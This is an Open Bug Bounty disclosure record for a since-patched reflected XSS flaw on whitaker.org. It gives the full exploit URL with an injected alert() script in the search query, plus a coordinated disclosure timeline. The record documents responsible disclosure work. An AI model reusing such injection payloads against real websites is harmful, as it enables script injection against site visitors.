whitaker.org XSS vulnerability

2016-08-17T22:15:00
ID OBB:176160
Type openbugbounty
Reporter iandioch
Modified 2017-11-24T12:37:00

Description

Vulnerable URL:
http://whitaker.org/search/google/qqqqqq%3C%3E%22%20?query=%27;alert(%27OPENBUGBOUNTY%27);//%27%22%20&cx;=009166379463057598962%3A6djpgzw9lym&cof;=FORID%3A11&sitesearch;=
Details:

Description| Value
---|---
Patched:| Yes, at 24.11.2017
Latest check for patch:| 24.11.2017 12:37 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 4127435
VIP website status:| No
Check whitaker.org SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 17 August, 2016 22:15 GMT
Generic security notifications sent to website owner| 17 August, 2016 22:19 GMT
Notification sent to subscribers (without technical details)| 18 August, 2016 02:17 GMT
Vulnerability details disclosed by researcher| 14 September, 2016 23:12 GMT
Vulnerability patched by the website owner| 24 November, 2017 12:37 GMT